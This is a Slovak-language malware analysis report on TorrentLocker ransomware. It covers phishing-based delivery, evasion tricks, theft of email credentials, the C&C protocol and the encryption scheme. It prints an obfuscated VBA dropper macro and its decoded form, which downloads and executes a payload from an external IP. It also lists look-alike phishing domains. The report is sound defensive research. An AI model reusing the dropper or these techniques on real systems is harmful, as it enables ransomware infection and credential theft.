TorrentLocker. Marc-Etienne M.Léveillé. Digitálny výpalník v okolitých krajinách. December 2014

Digitálny výpalník v okolitých krajinách Marc-Etienne M.Léveillé December 2014

Digitálny výpalník v okolitých krajinách Marc-Etienne M.Léveillé December 2014

OBSAH 1. Zhrnutie 3 2. Predstavenie 5 3. Infekčný vektor 6 3.1 Stránka na stiahnutie 7 3.2 CAPTCHA 8 3.3 Dokument programu Word s makrami VBA 9 4. Celková schéma 10 5. Analýza malvéru 12 5.1 Obfuskácia 12 5.1.1 Dropper 12 5.1.2 Spúšťač 13 5.2 Miestne ukladanie 13 5.3 Krádež prihlasovacích údajov k protokolu SMTP a adresára 14 5.4 Sieťový protokol 15 5.4.1 Výber C&C servera 15 5.4.2 Komunikačný protokol 15 5.4.3 Generovanie identifikačného kódu obete 17 5.5 Šifrovanie 18 6. Analýza dešifrovacieho softvéru 20 7. Podobnosť s bankovým trójskym koňom Hesperbot 21 7.1 Podobnosť stránok určených na šírenie malvéru 21 7.2 Opätovné použitie C&C servera 21 7.3 Cesta k súboru PDB 22 8. Štatistika 23 8.1 Metodológia 23 8.2 Výsledky 23 9. Záver 26 10. Poďakovanie 27 11. Odkazy 27 12. Prílohy 29 Príloha A: Snímky stránok s CAPTCHA, z ktorých sa sťahoval malvér 29 Príloha B: Zoznam známych domén, na ktorýchh sa nachádza stránka, z ktorej sa stiahne malvér 33 Príloha C: Zoznam známych URL adries.onion, ktoré doručujú informácie o platbe 37 Príloha D: Domény v TorrentLocker DGA 38 Príloha E: Zoznam typov súborov, ktoré TorrentLocker šifruje 39 Príloha F: Zoznam zakódovaných kľúčov 40 Príloha G: Zoznam príkladov 41

ZOZNAM TABULIEK Tabuľka č. 1. Príklad domén, ktoré používa TorrentLocker na šírenie 8 Tabuľka č. 2. Názov súboru a obsah miestneho uloženia TorrentLockera. 14 Tabuľka č. 3. Štruktúra správ zasielaných do C&C server. 15 Tabuľka č. 4. Popis rôznych typov dopytov, ktoré TorrentLocker posiela do svojho C&C servera 17 Tabuľka č. 5. Štruktúra pridaná za obsah zašifrovaného súboru. 19 Tabuľka č. 6. Zoznam serverov C&C kontaktovaných v rámci experiment. 23 Tabuľka č. 7. Podrobné údaje desiatich, po sebe idúcich platobných stránok, z jedného C&C servera. 25 ZOZNAM OBRÁZKOV Obrázok č. 1. Obrázok č. 2. Spôsoby, akými sa počítač infikuje TrrentLockerom z nevyžiadanej e-mailovej správy. 6 Stránka, ktorá sa zobrazí používateľom, ktorí používajú iný systém ako Windows. 7 Obrázok č. 3. Príklady stránok, z ktorých sa stiahol malvér. 8 Obrázok č. 4. Od infekcie až po zablokovaný stav. 10 Obrázok č. 5. Príklad stránky s výkupným v anglickom jazyku. 11 Obrázok č. 6. Príklad platobnej stránky v anglickom jazyku, zameranej na Veľkú Britániu. 11 Obrázok č. 7. Pred vykonaním škodlivých úloh sa TorrentLocker injektuje do ostatných procesov. 12 Obrázok č. 8. Žiadosť o OutputDebugString, 320 500 krát 13 Obrázok č. 9. Použitie chráneného uloženia API na získanie konfigurácie e-mailového klienta. 14 Obrázok č. 10. Rozloženie adresára klienta Thunderbird. 14 Obrázok č. 11. Príklad správy odoslanej do C&C servera. 16 Obrázok č. 12. Snímka obrazovky dešifrovacieho softvéru. 20 Obrázok č. 13. Kľúče AES nie sú jediným rozdielom v dešifrovacom softvéri, ktorý zločinci šíria. 20 Obrázok č. 14. Porovnanie URL adries stránok. 21 Obrázok č. 15. Pomer obetí, ktoré kybernetickým zločincom zaplatili za dešifrovací softvér. 24 Obrázok č. 16. Počet infekcií podľa krajín. 24 Obrázok č. 17. DHL - Rakúsko a Nemecko. 29 Obrázok č. 18. Office of State Revenue Austrália. 29 Obrázok č. 19. Auspost Austrália. 30 Obrázok č. 20. Česká pošta Česká republika. 30 Obrázok č. 21. TTNet Turecko. 31 Obrázok č. 22. Royal Mail Veľká Británia. 31 Obrázok č. 23. SDA Taliansko. 32

1. ZHRNUTIE Ransomvér je trieda škodlivého kódu rozširovaného kybernetickými zločincami, ktorí unesú počítač obete, napr. prostredníctvom zašifrovania dokumentov obete, príp. obmedzenia prístupu k aplikáciám. Zločinci požadujú peňažné výkupné za účelom odblokovania infikovaného počítača. Win32/Filecoder.DI, tiež známy pod menom TorrentLocker, patrí do skupiny ransomvéru, ktorý po spustení zakóduje dokumenty, obrázky a iné typy súborov používateľa. Od obete sa požaduje, aby zaplatila gangu zločincov až 4,081 bitcoinov (približne 1 150 eur) za účelom odšifrovania ich súborov. Toto výkupné je možné zaplatiť iba v bitcoinoch. Názov TorrentLocker mu dali isight Partners vo svojom blogu uverejnenom v auguste 2014 [8]. Pochádza z registračného kľúča používaného malvérom na uloženie konfiguračných informácií, upod falošným názvom Bit Torrent Application. Posledné verzie TorrentLocker už nepoužívajú túto kľúčovú cestu na uloženie informácií. HKEY_CURRENT_USER\Software\Bit Torrent Application\Configuration Na základe toho, čo zistila spoločnosť Vínsula v júni 2014 [7], tkybernetickí zločinci sa rozhodli nazvať ich projekt názvom Racketeer. Slovo rack sa nachádza v predponách funkcií a súborov vo vzorkách samotného TorrentLockeru (rack_init, rack_encrypt_pc, ) aj v názvoch súborov skriptov na C&C serveri (rack_cfg.php, rack_admin.php, ). Racket (v prekl. vydieranie) je v skutočnosti vhodným slovom na popis TorrentLockera: vytvára problém, ktorý je možné vyriešiť jedine zakúpením dešifrovacieho softvéru od zločincov. Nižšie sa nachádza súhrn zistení, o ktorých budeme v tomto dokumente informovať. Z 39 670 infikovaných systémov, 570 (1,45 %) zaplatilo zločincom výkupné. Týchto 570 platieb gangu nám hovorí, že zarobili sumu medzi 292 700 a 585 401 amerických dolárov v bitcoinoch. Podľa údajov z C&C serverov, doteraz bolo zašifrovaných minimálne 284 716 813 dokumentov. Domnievame sa, že hráči v pozadí TorrentLockera sú rovnakí ako tí, ktorí sú za skupinou malvéru HesperBot family, bankového trójskeho koňa. Rozosielanie nevyžiadaných e-mailov za účelom šírenia TorrentLockeru je cielené na špecifické krajiny. Doteraz boli útoky zamerané na nasledujúce krajiny: Austrália Rakúsko Kanada Česká republika Taliansko Írsko Francúzsko Nemecko Holandsko Nový Zéland Španielsko Turecko Veľká Británia 3

Hráči v pozadí TorrentLockeru reagovali na online správy tým, že porazili indikátory kompromitácie (IOC) používané na detekciu a zmenu spôsobu, ako používajú AES z režimu CTR na režim CBC po tom, čo bol zverejnený spôsob rozbalenia hesla. Prvé stopy TorrentLockera, podľa telemetrie ESETu, sú z februára 2014. Online hlásenia sú tiež z tohto dátumu.. 4

2. PREDSTAVENIE O TorrentLockeri sa na online stránkach objavilo mnoho informácií. Vieme, že niektoré informácie uvedené v tejto správe už boli nahlásené a analyzované. Ale z dôvodu kompletnosti sme sa rozhodli zahrnúť ich do tejto správy a uviesť organizáciu, ktorá ich nahlásila ako prvá. Na konci tohto dokumentu sa nachádza úplný zoznam odkazov. Na konci roka 2013 si získal ransomvér CryptoLocker [21] veľkú pozornosť. Bol zistený v rámci operácie Operation Tovar [22] v polovici roka 2014. I napriek mnohým podobnostiam, TorrentLocker predstavuje iné ohrozenie. Prvé online hlásenie o skupine malvéru TorrentLocker uverejnil TÜBİTAK BİLGEM [1] 20. februára 2014. Snímka obrazovky editora registra systému Windows jednoznačne ukazuje použitie HKCU\ Software\Bit Torrent Application\Configuration tak, ako to popísali isight Partners [8] v auguste 2014. Verzie zo začiatku roka 2014 neboli až natoľko dômyselné, ako aktuálne šírené verzie malvéru. Od obetí požadovali zaslanie e-mailových správ páchateľom, aby mohli vykonať platbu a dostať dešifrovacie kľúče. Táto časť je v súčasnosti automatizovaná vďaka platobnej stránke, ktorá oznamuje ako zaplatiť bitcoinami za účelom získania dešifrovacieho softvéru. Účelom tejto správy je: predstaviť naše zistenia o najaktuálnejších verziách TorrentLockera, poskytnúť technické podrobnosti o šifrovaní, ktoré malvér používa a vytvoriť odkaz pre budúci výskum tejto hrozby a ransomvéru vo všeobecnosti. Tento dokument je rozdelený do štyroch hlavných častí. Začína sa popisom infekčného vektora ransomvéru TorrentLocker. Potom nasleduje analýza malvéru vrátane podrobností o šifrovaní. Potom nasleduje diskusia o prepojeniach, ktoré sme zistili medzi ľuďmi okolo Hesperbota a TorrentLockera. V poslednej časti sú uvedené štatistiky získané z C&C serverov. 5

Download TorrentLocker 3. INFEKČNÝ VEKTOR Hlásenia online od obetí TorrentLockera ukazujú, že infekcia vždy začína nevyžiadanou e-mailovou správou, ktorá od obete požaduje, aby otvorila dokument. Týmto dokumentom je v skutočnosti škodlivý spustiteľný súbor, ktorý nainštaluje TorrentLocker a zašifruje súbory. Telemetria ESETu zároveň naznačuje, že nevyžiadaná správa by mohla byť od augusta 2014 jediným spôsobom infekcie. Cielená e-mailová správa Príloha e-mailovej správy Odkaz na stránku From: From: Dokument MS Word obsahujúci VBA makro Stránka s malvérom s CAPTCHA VBA Co24xH ZIP TL!Torrent Locker Škodlivý spustiteľný súbor EXE Stiahnutie a spustenie ZIP Infikovanie počítača a zakódovanie súboru Obrázok č. 1. Spôsoby, akými sa počítač infikuje TrrentLockerom z nevyžiadanej e-mailovej správy Ako je možné vidieť na obrázku č. 1, existuje niekoľko spôsobov, ako je možné spustiť škodlivý spustiteľný súbor. Boli sme svedkami všetkých zobrazených spôsobov. Napríklad v niektorých prípadoch sa TorrentLocker nachádzal v súbore.zip, ktorý bol prílohou e-mailovej správy. V ostatných prípadoch správa obsahuje prepojenie na stiahnutie súboru.zip buď priamo alebo zo stránky na stiahnutie s aktívnym testom CAPTCHA. 6

Nižšie uvádzame niekoľko príkladov predmetov správy poslanej obetiam: Nezaplatená faktúra Sledovanie balíka Nezaplatená pokuta za prekročenú rýchlosť Vo všetkých prípadoch je správa zameraná špecificky na polohu obete. Napríklad, ak je predpoklad, že obeť sa nachádza v Austrálii, bude jej zaslaná falošná informácia o sledovaní balíku, ktorá vyzerá, ako keby bola zaslaná od spoločnosti Australia Post. Polohu potenciálnej obete je možné určiť pomocou domény najvyššej úrovne používanej v e-mailovej adrese cieľa alebo poskytovateľa internetového pripojenia, na ktorého odkazuje. 3.1 Stránka na stiahnutie Jedným z obľúbených a efektívnych spôsobov šírenia TorrentLockera je použitie stránky na stiahnutie, ktorá imituje webové stránky miestnych firiem alebo vládnych organizácií. V tomto scenári je obeti v e-mailovej správe zaslaný odkaz na stránku. Keď obeť klikne na tento odkaz, zobrazí sa falošná stránka, ktorá navádza na stiahnutie škodlivých spustiteľných súborov. Tieto stránky na stiahnutie sa zobrazujú iba používateľom z určitých krajín. Návštevník pochádzajúci z krajiny, ktorá nie je cielená, bude presmerovaný na stránku Google. Filtrovanie je založené na IP adrese obete. Návštevník, ktorý otvorí stránku v operačnom systéme inom ako Windows, bude vyzvaný, aby na návštevu stránky použil počítač so systémom Windows. Na zistenie, či počítač používa Windows, používa server používateľského agenta prehliadača. Obrázok č. 2. Stránka, ktorá sa zobrazí používateľom, ktorí používajú iný systém ako Windows Hráči stojaci za týmto podvodom kupujú názvy domén, ktoré vyzerajú veľmi podobne ako skutočné domény, za účelom oklamania používateľa, ktorý si myslí, že stránky sú skutočné. V nasledujúcej tabuľke je uvedených niekoľko príkladov. 7

Tabuľka č. 1. Príklad domén, ktoré používa TorrentLocker na šírenie. Doména falošnej stránky austpost-tracking.com austpost-tracking.org royalmail-tracking.org royalmail-service.co.uk nsw-gov.net osr-nsw-gov.net Doména skutočnej stránky austpost.com.au royalmail.com osr.nsw.gov.au Zoznam známych domén používaných touto skupinou pre stránky na stiahnutie a šírenie TorrentLockera v novembri 2014 je uvedený v Prílohe B. 3.2 CAPTCHA Aby si obeť myslela, že stránka je skutočná, je požiadaná, aby pre stiahnutie údajného dokumentu zadala CAPTCHA kód z obrázka. Tento spôsob použitia obrázka CAPTCHA dáva návštevníkovi falošný pocit bezpečia. V prvých verziách týchto stránok mohol používateľ zadať čokoľvek a škodlivý súbor.zip sa stiahol. Na nových falošných stránkach, stránka odmietne šírenie ransomvéru v prípade zadania nesprávneho kódu z obrázka CAPTCHA. Obrázok č. 3: Príklady stránok, z ktorých sa stiahol malvér. Viac snímok stránok, z ktorých sa stiahol malvér, na stiahnutie nájdete v Prílohe A. 8

3.3 Dokument programu Word s makrami VBA V novembri 2014 bol spozorovaný nový spôsob infikovania. Na šírenie TorrentLockera sa stále používajú e-mailové správy, ale tento krát je to súbor.zip ako príloha k správe. Tento.zip súbor obsahuje dokument programu Word (.doc) Ak používateľ zapne makrá, spustí sa skript VBA. Skript následne stiahne a spustí binárny súbor Win 32 PE TorrentLockera. Skript VBA je mierne obfuskovaný. Pôvodný obfuskovaný kód VB [...] Open Chr(82) & Chr(76) & Chr(76) & Chr(69) & Chr(81) & Chr(65) & Chr(46) & Chr(82) & Chr(72) & Chr(76) For Binary As 12 kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf Put #12,, eheqiubn kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf Close #12 kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf cmxhwsuo: kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf xwrr5e2ngn3ofo65cnfwctqt7rvvyxzu0gbdg47u8h3zgt9hcb Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(49) & Chr(48) & Chr(57) & Chr(46) & Chr(49) & Chr(48) & Chr(53) & Chr(46) & Chr(49) & Chr(57) & Chr(51) & Chr(46) & Chr(57) & Chr(57) & Chr(47) & Chr(97) & Chr(46) & Chr(112) & Chr(110) & Chr(103), Environ(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & Chr(92) & Chr(74) & Chr(75) & Chr(87) & Chr(84) & Chr(89) & Chr(65) & Chr(68) & Chr(88) & Chr(74) & Chr(85) & Chr(77) & Chr(46) & Chr(101) & Chr(120) & Chr(101) kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf End Sub kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf kbeppoanqkcvsptytcxsbnceypghnorqezvlkymbfzjadffpocptpxyuoiihvvlqgkjeexvnotpvggwf Neobfuskovaný kód Open RLLEQA.RHL For Binary As 12 Put #12,, eheqiubn Close #12 cmxhwsuo: DownloadAndExecute http://109.105.193.99/a.png, Environ( temp ) & \J KWTYADXJUM.exe End Sub Tento kód slúži ako dropper, stiahne a spustí súbor so zavádzajúcim menom a.png, ktorý je v skutočnosti binárnym súborom Win32 PE, ktorý obsahuje škodlivý kód TorrentLocker. 9

4. CELKOVÁ SCHÉMA 2. ZAPLAŤ Infikovaný počítač 1. C&C server 1. 2. Počítač obete je infikovaný ransomvérom TorrentLocker TorrentLocker odosiela správu do C&C servera C&C server odosiela stránku s informáciou o výkupnom TorrentLocker vygeneruje kľúč na zašifrovanie súborov Šifrovací kľúč sa odošle na C&C server, kde sa uloží Dokumenty sa zašifrujú príslušným kľúčom Kľúč sa zlikviduje v počítači obete Obeti sa zobrazí stránka požadujúca výkupné Počet zašifrovaných súborov sa nahlási do C&C servera Obrázok č. 4: Od infekcie až po zablokovaný stav. Keď sa spustí jadro TorrentLockera, požiada server C&C o zobrazenie stránky s výkupným. Táto stránka s výkupným je stránkou HTML s varovaním o infekcii a obsahuje odkaz na platobnú stránku. V prípade úspechu a získania stránky, TorrentLocker vygeneruje náhodný, 256-bitový kľúč s AES šifrovaním. Tento kľúč je pred odoslaním do C&C servera zašifrovaný RSA pomocou zakódovaného 2048-bitového verejného kľúča. TorrentLocker začne so šifrovaním dokumentov v počítači používateľa pomocou vygenerovaného AES kľúča. Šifrovanie je obmedzené na súbory s určitými koncovkami. Zoznam koncoviek je zakódovaný v binárnom kóde (nachádza sa v Prílohe E). Vyhľadá súbory na všetkých pripojených diskoch a sieťových zdrojoch. Po dokončení sa kľúč vymaže z pamäte pomocou funkcie memset (aes_key, 0, aes_key_ size). Ak pamäť nebola odpojená počas procesu šifrovania, je nepravdepodobné, že po úspešnom zašifrovaní sa podarí vytiahnuť kľúč z pamäte. Používa aj funkciu memsetfrom každej kópie vytvoreného kľúča. Nakoniec sa zobrazí stránka s výkupným. 10

Obrázok č. 5: Príklad stránky s výkupným v anglickom jazyku. Stránka s výkupným obsahuje odkaz na platobnú stránku, ktorú je možné dosiahnuť prostredníctvom hostiteľského počítača siete Tor prepojeného na doménu.onion. Čo je zaujímavé, tento server prepojený na doménu.onion je v skutočnosti tým istým hostiteľským počítačom, ktorý slúži ako C&C server pre TorrentLocker. Je zakódovaný štandardným názvom domény v príkladoch TorrentLockera, čím zverejňuje ich IP adresy. Vďaka tomu je jednoduché nájsť skutočné umiestnenie servera (resp. pravdepodobne reverzného proxy servera). Obrázok č. 6: Príklad platobnej stránky v anglickom jazyku, zameranej na Veľkú Britániu. Na stránke sa nachádzajú odkazy na neslávne známy CryptoLocker. I napriek použitiu loga CryptoLockera, nepatrí do tej istej skupiny malvéru. Toto je pravdepodobne trik na zmätenie obetí, ktoré hľadajú pomoc, príp. jeho autori boli natoľko leniví, že sa im nechcelo vymyslieť vlastnú značku. 11

5. ANALÝZA MALVÉRU 5.1 Obfuskácia New process explorer.exe Dropper Launcher rack-core TorrentLocker Obrázok č. 7: Pred vykonaním škodlivých úloh sa TorrentLocker injektuje do ostatných procesov Pred spustením platby prebehnú dve vrstvy injektácie. Spustiteľný súbor sa šíri v súbore.zip, ktorý nazveme dropper. Tento dropper odšifruje druhú vrstvu, ktorú nazývame spúšťač (launcher). Nakoniec, spúšťač injektuje kód do explorer.exe a spustí vzdialené vlákno v exportovanom symbole remote_entry. 5.1.1 Dropper Videli sme niekoľko rôznych verzií droppera, ale táto analýza je založená na príklade s dátumom zostavenia 15. október 2014 (SHA-1 začínjúce 40B1D84B). Dropper použije niektoré známe triky na analýzu kódovania binárneho kódu, ako napríklad dynamické rozlišovanie externých symbolov. Neštandardnou technikou zabránenia odstraňovania chýb je použitie API OutputDebugString. Za normálnych okolností, OutputDebugString neurobí nič a okamžite sa vráti, v prípade odstraňovania chýb procesu sa údaje odošlú do odstraňovača chýb (debuggera). Votrelec požiada o vykonanie funkcie 320 500 krát, kvôli čomu sa odstraňovač chýb zasekne, pretože je príliš pomalý na spracovanie všetkých týchto žiadostí. Dokáže tiež poraziť bezpečnostné mechanizmy Sandbox, ktoré spúšťajú proces v režime odstraňovania chýb. Po skončení slučky pokračuje ďalej v spúšťaní. 12

Obrázok č. 8: Žiadosť o OutputDebugString 320 500 krát Pakovací program použije dva zdroje PE z droppera na rozbalenie jeho obsahu. Prvý zdroj obsahuje 16-bajtový kľúč na začiatku na dešifrovanie zvyšku samého seba. Nanovo dešifrovaná časť obsahuje kľúč na dešifrovanie druhého zdroja a niečoho, čo vyzerá ako konfigurácia pakovacieho programu. Zmenou tejto konfigurácie dokáže pakovací program zapnúť niektoré antivirtuálkové triky, ako napr. kontrola výsledku pokynu in alebo vpcext, ktoré sa používajú na detekciu VMWare, resp. virtualizačného softvéru VirtualPC. Šifrovanie použité na dešifrovanie zdroja je mierne upravené RC4. Počas dešifrovania, premenná, ktorá by mala byť nastavená na nulu, zostáva bez úprav. To znamená rozdielny výsledok v dešifrovanom čistom texte. Čo je zaujímavé, táto chyba sa nachádza tiež v MiniDuke, ako to zdokumentoval F-Secure vo svojom dokumente o skupine takéhoto softvéru (strana 9). Nie je jasné, či tam táto chyba bola ponechaná zámerne, alebo iba na oklamanie hľadačov malvéru. Čistý text druhého zdroja je súbor PE. Dropper vytvorí nový proces v pozastavenom stave, nájde pamäť v tomto novom procese, zapíše obsah dešifrovaného PE súboru a obnoví proces na jeho spustenie v počiatočnom bode. Tento nový proces nazývame spúšťač. 5.1.2 Spúšťač (launcher) Spúšťač je vcelku jednoduchý. Má dva dôvody: skopírovať dropper a spustiť jadro TorrentLockera. Aby tak mohol urobiť, dešifruje a potom rozbalí DLL s aplib a vloží svoj kód do nového procesu explorer.exe alebo svchost.exe. Ak nemá administrátorské práva, vyžiada si ich od používateľa a potom opätovne spustí dropper s nimi. 5.2 Miestne ukladanie TorrentLocker ukladá niektoré údaje priamo v infikovanom zariadení. Predtým ukladal údaje do registra systému Windows, ale najaktuálnejšie verzie používajú súbory v náhodne pomenovaných adresároch pod adresárom Application Data (Údaje aplikácie) v profile All Users (Všetci používatelia), príp. v adresári Programs (Programy). Súbory sú zašifrované kódom AES-256- CBC. Kľúč je zakódovaný v binárnej sústave a mení sa v závislosti na kampani. Existuje aj kód na vytvorenie kľúča AES založeného na dátume inštalácie systému Windows, ale vyzerá to, že tento kód sa nepoužíva. Inicializačný vektor (IV) je rovnaký vo všetkých skúmaných variantoch. Je uvedený v Prílohe F. 13

Tabuľka č. 2. Názov súboru a obsah miestneho uloženia TorrentLockera. Názov súboru (alebo kľúča registra) Obsah 00000000 Číslo predstavujúce jeho aktuálny stav (stránka s výkupným prijatá, súbory sú zašifrované, atď.) 01000000 PE súbor droppera 02000000 Cesta k dropperovi, súboru PE na disku 03000000 Obsah HTML stránky s výkupným 04000000 Počet zašifrovaných súborov 5.3 Krádež prihlasovacích údajov k protokolu SMTP a adresára Vedľajšou úlohou TorrentLockera je získavať údaje z e-mailových klientov. Ukradne prihlasovacie údaje pre nastavenia SMTP servera a adresár obete. Obsahuje kód, ktorý funguje pre Thunderbird, Outlook, Outlook Express a Windows Mail. Obrázok č. 9: Použitie chráneného uloženia API na získanie konfigurácie e-mailového klienta. Obrázok č. 10: Rozloženie adresára klienta Thunderbird. Keďže vieme, že TorrentLocker sa šíri prostredníctvom nevyžiadaných e-mailových správ, krádež týchto informácií má veľký význam. Útočníci používajú zoznam e-mailových adries, ktoré získajú, 14

na rozoslanie ďalších nevyžiadaných správ. Dokáže tiež použiť poverenia protokolu SMTP na vyrovnanie reputácie legitímnych kont SMTP, na odoslanie jeho prepojení a príloh, ktoré vedú k ďalších inštaláciám TorrentLockera. 5.4 Sieťový protokol Nezabudnite, že sieťový protokol popísaný v tomto dokumente je založený na príkladoch ransomvéru TorrentLocker šíreného medzi októbrom 2014 a vydaním tohto dokumentu. 5.4.1 Výber C&C servera TorrentLocker komunikuje so svojim C&C serverom pomocou zakódovanej URL adresy nachádzajúcej sa v spustiteľnom súbore. V prípade, že doména sa nerozlúšti alebo server neodpovedá, na vytvorenie zoznamu 30 názvov domén sa použije algoritmus na generovanie domén (DGA). Funkcia DGA bola pridaná do TorrentLockera v októbri 2014. Kompletný zoznam názvov domén vygenerovaných najaktuálnejšími verziami TorrentLockera sa nachádza v Prílohe D. Jedna z nich je zaregistrovaná, ale neslúži ako C&C server (nereaguje na HTTPS). Nemyslíme si, že páchateľ túto doménu zaregistroval. 5.4.2 Komunikačný protokol TorrentLocker používa celkom jednoduchý protokol na hlásenie do svojho C&C servera. Tento protokol sa časom zmenil. Táto správa popisuje najnovšiu verziu, aktuálne používanú. Šifrovanie TorrentLocker používa na šifrovanie komunikácie s C&C serverom protokol SSL. O niektorých verziách je známe, že namiesto SSL používajú šifrovanie XOR, ako to popísali isight Partners [10] v septembri 2014. Každá požiadavka HTTP POST do C&C servera obsahuje nasledovné údaje: Tabuľka č. 3. Štruktúra správ zasielaných do C&C servera. Typ Nulou ukončený reťazec s 32 znakmi (66 bajtov) Nulou ukončený reťazec s 32 znakmi (66 bajtov) Popis Generované identifikačné číslo počítača založené na názve počítača, verzii systému Windows a dátume inštalácie Názov kampane Celé číslo, 1 bajt Typ dopytu (0-6) Celé číslo, 4 bajty n bajtov Dĺžka doplnkových údajoch (0 v prípade, že sa neposielajú žiadne doplnkové údaje) Doplnkové údaje 15

Obrázok č. 11: Príklad správy odoslanej do C&C servera. Nižšie je uvedený obsah polí pre túto ukážkovú správu: { } computer_id: RICK-PC-E4C03B402B6B37D378844361 campaign_id: ad-x command_id: 4 (Send SMTP credentials) arg_length: 120 arg_string: smtp.mail.yahoo.com:25:orgone_2000@yahoo.com:passw0rd123:0\r\n Nižšie je uvedený zoznam dostupných typov dopytov, ktoré môžu byť odoslané do C&C servera: 16

Tabuľka č. 4. Popis rôznych typov dopytov, ktoré TorrentLocker posiela do svojho C&C servera. Typ Popis Obsah doplnkových údajov Údaje vrátené z C&C servera 0 Načítať stránku žiadny stránka HTML s výkupným 1 Poslať kľúč AES-256 Kľúč AES-256 zašifrovaný RSA žiadne zašifrovaný RSA 2 Poslať zašifrovaný počet Zašifrovaný počet súborov (celé číslo, 4-bajty) žiadne súborov 3 Poslať adresár Zoznam mien a e-mailových adries v adresári žiadne 4 Poslať poverenia SMTP Zoznam SMTP údajov v stĺpcoch (server, port, žiadne užívateľské meno a heslo, atď.) 5 Poslať poverenia SMTP Podobné ako typ č. 4 žiadne 6 Poslať protokoly Vlákno správy s informáciami o chybe, funkcii a riadku žiadne 5.4.3 Generovanie identifikačného kódu obete Keď sa počítač infikovaný TorrentLockerom nahlási do svojho C&C servera, vygeneruje sa používateľský kód, ktorý neskôr bude slúžiť na identifikáciu tejto obete a ktorý udáva jedinečnú adresu URL, kde je možné zaplatiť a stiahnuť softvér na dešifrovanie. URL adresa má nasledujúci tvar: http://<dot_onion_domain_name>/buy.php?<user_code> Pre uľahčenie prístupu k.onion doméne, stránka s výkupným obsahuje prepojenie na webové stránky pôsobiace ako prenosy na Tor2web tak, aby si obete nemuseli do počítača inštalovať webové prehliadače, kde je aktivovaný Tor, aby mali prístup na platobnú stránku. Používateľský kód vyzerá ako náhodný reťazec 6 alfanumerických znakov. Avšak v prípade dvoch infikovaní v podobnom čase, ich používateľské kódy budú tiež podobné. Je veľmi pravdepodobné, že používateľské kódy boli buď založené na čase, príp. nasledujú postupnosť. Po ďalšej analýze zistili analytici ESETu, že serverom generované používateľské kódy sú v skutočnosti predvídateľné. Zoberme si tri používateľské kódy vygenerované serverom v 10-sekundových intervaloch (➊). base 36 to base 10 5un33i -> 353796462 -> 3537 96462 -- 3537 + 96462 = 99999 5up899 -> 353896461 -> 3538 96461 -- 3538 + 96461 = 99999 5urdf0 -> 353996460 -> 3539 96460 -- 3539 + 96460 = 99999 ➊ ➋ ➌ +1-1 ➍ Používateľský kód je v skutočnosti 36-miestne celé číslo. Po konverzii do desiatkovej sústavy (➋), vznikne vysoké 9-miestne až 10-miestne celé číslo. Ak oddelíte posledných 5 číslic od ostatných (➌), dostanete dve série. Séria najdôležitejších číslic sa zakaždým zvyšuje po jednom čísle, zatiaľ čo séria najmenej dôležitých číslic sa znižuje. Ak pridáte dve celé čísla, zistíte, že súčet je vždy 99999 (➍). Pre prevádzkovateľov to vytvára bezstavový spôsob ako overiť, či používateľský kód je legitímny alebo nie. 17

Na základe týchto vedomostí sa podarilo analytikom ESETu vyžiadať si všetky stránky s výkupným z rôznych C&C serverov. Štatistiky sú uvedené v časti Štatistiky tohto dokumentu. 5.5 Šifrovanie V septembri 2014 uverejnil NIXU [9] blogový príspevok s trikmi, ako dešifrovať súbory zašifrované TorrentLockerom. Bolo možné rozbaliť heslo XORovaním zašifrovaného súboru s veľkosťou 2 MB jeho nezašifrovanou kópiou. Používateľ Nathan Scott poskytol tiež nástroj s grafickým užívateľským rozhraním na automatizáciu dešifrovacieho procesu. Po zverejnení informácie o možnosti rozbalenia hesla autori TorrentLockera zmenili šifrovanie, aby vylúčili túto možnosť. Heslo bolo možné rozbaliť, pretože TorrentLocker používal AES-256 v režime CTR (Counter) s rovnakým kľúčom a IV pre každý súbor. V tomto režime heslo nie je závislé na obsahu čistého textu, vďaka čomu je AES v režime CTR celé číslo v rade. Preto je na rozbalenie hesla možné použiť rovnaký kľúč použitím XORovania známymi číslami. Toto heslo je možné prehrať na inom zašifrovanom dokumente na získanie čistého textu. Na zabránenie spôsobu rozbaľovania tohto hesla autori TorrentLockera zmenili spôsob šifrovania, ktoré používajú na šifrovanie dokumentov v infikovanom systéme. Stále sa šifrujú pomocou AES-256, ale teraz používajú režim CBC (Cipher-block chaining). CBC chráni proti rozbaleniu hesla. Zvyšok šifrovania popísaného v tomto dokumente platí aj na staršie verzie TorrentLockera. TorrentLocker používa pre potreby šifrovania knižnicu LibTomCrypt. Generovanie kľúča Počas infikovania sa generuje jediný kľúč AES-256. Tento kľúč sa potom používa na zašifrovanie všetkých súborov v systéme. Na vygenerovanie 256-bitového kľúča sa používa algoritmus Yarrow od LibTomCrypt, generátor pseudonáhodného čísla. Je nasadený so spätnou hodnotou nasledujúcich funkcií: 1. GetTickCount 2. GetCurrentProcessId 3. GetCurrentThreadId 4. GetDesktopWindow 5. GetForegroundWindow 6. GetShellWindow 7. GetCapture 8. GetClipboardOwner 9. GetOpenClipboardOwner 10. GetFocus 11. GetActiveWindow 12. GetKBCodePage 13. GetProcessHeap 14. GetThreadTimes(GetCurrentThread()) 15. GetProcessTimes(GetCurrentProcess()) Aj keď niektoré z bajtov v tomto 120-bajtovom jadre je možné uhádnuť, je tu príliš veľa neznámych, aby bolo možné násilím prelomiť jadro a pokúsiť sa vygenerovať rovnaký kľúč. IV používané pre AES-256 bolo rovnaké pre všetky binárne kódy TorrentLockera. Je uvedené v Prílohe F. 18

